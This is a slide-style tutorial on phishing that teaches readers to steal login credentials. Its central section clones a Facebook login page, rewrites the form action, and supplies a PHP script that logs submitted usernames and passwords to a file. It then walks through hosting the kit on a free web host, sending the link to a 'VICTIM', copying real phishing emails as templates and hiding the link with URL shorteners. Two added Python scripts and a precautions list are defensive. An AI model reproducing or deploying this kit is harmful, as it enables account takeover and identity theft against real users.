
Phishing

(A Social Engineering Technique)


Session Flow

History of Phishing
What is Phishing?
Types of Phishing
Why is it called a Social Engineering Technique?
Steps to perform Phishing
Tricks to perform Phishing
Precautions against Phishing Attempts
History of Phishing

Similar to fishing in a lake or river, phishing is computer lingo for fishing over the Internet for personal information.
The term was first used in 1996, when the first phishing act was recorded.
Phishing uses link manipulation, image filter evasion and website forgery to fool Web users into thinking that a spoofed website is genuine and legitimate.
Once the user enters vital information, he immediately becomes a phishing victim.
What is Phishing?

Phishing is the fraudulent act of acquiring private and sensitive information, such as credit card numbers, personal identification and account usernames and passwords.

Using a complex set of social engineering techniques and computer programming expertise, phishing websites lure email recipients and Web users into believing that a spoofed website is legitimate and genuine.

In actuality, the phishing victim later discovers his personal identity and other vital information have been stolen and exposed.
Types of Phishing

Web Based Phishing

Desktop Phishing

Spear Phishing

SMS Phishing

Voice Phishing (a.k.a. Vishing)


Web Based Phishing : Web based phishing is a way of attempting to
acquire information such as usernames, passwords, and credit card details
by masquerading as a trustworthy entity in an electronic communication
via emails and social networking sites.

Desktop Phishing : Desktop phishing is a kind of phishing where the attacker only has to replace some text in the hosts file located in the Windows directory on the victim machine. Whenever the victim goes to a real website like yahoo.com, the real website won't open; instead, the phishing page, which is hosted on the attacker's computer, will open.
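As an added defensive check, not part of the original slides: the following Python script parses a Windows hosts file and reports entries that redirect a watched login domain to a non-loopback address, which is exactly the modification desktop phishing relies on. The hosts file contents, the watched domain list and the 192.0.2.10 address are constructed samples.

```python
import ipaddress

# Constructed sample of a Windows hosts file after a desktop-phishing
# modification: yahoo.com is pointed at a machine the attacker controls.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.0.2.10      yahoo.com www.yahoo.com   # injected line
10.0.0.5        intranet.corp.local
"""

# Constructed list of domains the user signs in to; an override of any of
# these (or of a subdomain) is a red flag.
WATCHED_DOMAINS = {"yahoo.com", "facebook.com", "gmail.com", "mail.google.com"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs, ignoring comments and blank lines."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            yield ip, name.lower()


def find_hosts_overrides(text, watched=WATCHED_DOMAINS):
    """Return (hostname, ip) for watched domains redirected by the hosts file.

    Loopback entries are skipped because they merely block a site; any other
    address silently sends the browser to a different server.
    """
    hits = []
    for ip, name in parse_hosts(text):
        try:
            if ipaddress.ip_address(ip).is_loopback:
                continue
        except ValueError:
            continue  # malformed address; the OS resolver ignores it too
        if name in watched or any(name.endswith("." + d) for d in watched):
            hits.append((name, ip))
    return hits


if __name__ == "__main__":
    for name, ip in find_hosts_overrides(SAMPLE_HOSTS):
        print(f"WARNING: {name} is redirected to {ip} by the hosts file")
```

On a real machine, read the text from C:\Windows\System32\drivers\etc\hosts (or /etc/hosts) and pass it to find_hosts_overrides.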

Spear Phishing : Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is, by far, the most successful on the internet today, accounting for 91% of attacks.
SMS Phishing : SMS phishing attempts occur when a cell phone user is the recipient of a message acknowledging receipt of an unknown purchase. To terminate the bogus purchase and avoid monthly or daily charges, consumers are directed to phishing websites. Unknowingly, customers go directly to the website, allowing hackers to access personal cell phone information. SMS phishing has become increasingly prevalent on social networking sites, such as Facebook.

Voice Phishing : Voice phishing is currently the latest type of phishing. Not
all phishing attacks require a fake website. Messages that claimed to be
from a bank told users to dial a phone number regarding problems with
their bank accounts. Once the phone number (owned by the phisher, and
provided by a Voice over IP service) was dialled, prompts told users to
enter their account numbers and PIN. Vishing (voice phishing) sometimes
uses fake caller-ID data to give the appearance that calls come from a
trusted organization.
Phishing – A Social Engineering Technique

Why Phishing is also termed as Social Engineering Technique?

These days, due to enhanced security in major social networking sites and banking sites, no method is available to steal usernames, passwords, credit card details etc. directly.
Thus an indirect way called Phishing is used to steal usernames, passwords, credit card details and much other confidential information.
Every indirect way of performing hacking is called a Social Engineering Technique, and Phishing is one of them.
Steps to perform Phishing

Step 1 : Create a fake page of the target web page, i.e. the gmail, ymail, facebook etc. login page that you want to phish.

• How to create a fake page?

• In order to create a fake page, you need to go to the target web page. For example, if you want to phish someone's facebook account username and password, you need to go to https://www.facebook.com and save the web page by either pressing Ctrl + S or by right clicking on the screen and choosing the Save Page As option.

• Now you need to open it in any text editor like Notepad, Notepad++ etc.

• After opening it in Notepad, press Ctrl + F to find the action keyword, which is inside the HTML form.
• Change the value of action to login.php.
• Check for other actions, if any, used inside other forms.
• Save it and give it any appropriate name with the .html extension.
• That's it, you have successfully created a fake page a.k.a. phishing page.
Step 2 : Create a Phishing Script.

• How to create a Phishing Script?

• Copy the below given PHP code in Notepad and save it as login.php

<?php
// Send the browser on to the real login page so the visitor sees nothing unusual.
header('Location: https://www.facebook.com/login.php?login_attempt=1');
// Append every submitted form field to log.txt as one name=value pair per line.
$handle = fopen("log.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 3 : Upload these 2 files, i.e. the fake page and the phishing script, on some server.

Hackers mostly use free web hosting services like 000webhost.com, byethost.com and many other such sites.

In this tutorial, we will use 000webhost.com to upload our files.

Follow the below simple steps to upload your files.

1. Sign up on 000webhost.com.
2. Log in to 000webhost.com.
3. Go to CPanel.
4. Open FTP Details.

5. Change the default password.
6. Go back and open File Manager.
7. Go to the public_html folder and upload your files there using the upload functionality given on the website.
Note: You have to strictly upload your files in the public_html folder.
8. Open your fake page link now. You'll see a page identical to facebook which is not the real one but your phishing page.

Step 4 : Send the fake page link to the VICTIM via an email or any other media.
Step 5 : As soon as the VICTIM opens your page and enters the credentials, his credentials will be logged on your server and a new file named log.txt will be generated at the following location.
File Manager -> public_html -> log.txt
Step 6 : Open log.txt to see the VICTIM's username and password.
That's it, you have phished a VICTIM successfully.
Tricks to perform Phishing

Below are some real emails that were recorded as phishing attempts on some popular sites.
You can also do it in the same way.

Example 1 : Password Expiration

Subject: Your password will expire soon
Date: September 19, 2014
<BAD LINK: Click here to proceed with your Email update>

Example 2 : System Maintenance

Subject: System Maintenance!: Verify Your Email Address
Date: September 13, 2014
From: IT Service Desk <rodemaker3@tritons.iowacentral.edu>
Sent: Saturday, September 13, 2014 5:04 PM
To:
Subject: System Maintenance!: Verify Your Email Address

IT Cornell Service System Maintenance!

Our systems have detected an unusual high volume email traffic from this email address with the data listed below:

Email sent from:
--------------------------------
Total Email sent in 24hrs: 21,639
--------------------------------
Time: 2014-09-12 T 07:09:26Z
--------------------------------
IP address: 207.43.188.4

You can also shorten your fake page link, or phishing link, by using some URL shortening services.
Below are some good URL shorteners.

1. http://goo.gl - Google's URL shortening service.
2. http://bit.ly - Bitly URL shortening service.
3. http://tinyurl.com - TinyURL shortening service.
Precaution against Phishing Attempts

There is no prevention against phishing attacks, but one can always take some precautions while surfing the Internet and using their accounts.
Following are the precautionary measures that one needs to take to stay away from getting phished.

1. Never open your account from any untrusted (3rd party) link.
2. In case of doubt, always check the value of the form's action attribute by either pressing Ctrl + U or by right clicking on the screen and selecting View Page Source.
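The check in point 2 can be automated. The following Python script is an added example, not part of the original slides: it parses a saved HTML page, resolves every form's action against the URL the page was loaded from, and flags any form that would submit credentials to a host other than the expected domain, which catches the action="login.php" rewrite described in Step 1. The two sample pages and the free-host.example URL are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            # A missing or empty action submits to the page's own URL.
            self.actions.append(dict(attrs).get("action") or "")


def suspicious_form_actions(html, page_url, expected_host):
    """Return resolved form targets that do not submit to expected_host.

    Relative actions such as 'login.php' are resolved against page_url, so a
    saved login page served from another host is flagged even though the
    action looks harmless on its own.
    """
    parser = FormActionCollector()
    parser.feed(html)
    flagged = []
    for action in parser.actions:
        target = urljoin(page_url, action)
        host = urlsplit(target).hostname or ""
        if host != expected_host and not host.endswith("." + expected_host):
            flagged.append(target)
    return flagged


# Constructed sample: a saved login page whose form action was rewritten to
# a local PHP script, as the tutorial describes.
PHISHING_PAGE = """<html><body>
<form id="login_form" action="login.php" method="post">
  <input type="text" name="email"><input type="password" name="pass">
</form></body></html>"""

# Constructed sample: the same form as the genuine site would serve it.
GENUINE_PAGE = '<form action="https://www.facebook.com/login.php?login_attempt=1" method="post"></form>'

if __name__ == "__main__":
    print(suspicious_form_actions(PHISHING_PAGE, "http://free-host.example/index.html", "facebook.com"))
```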
Thank You !!
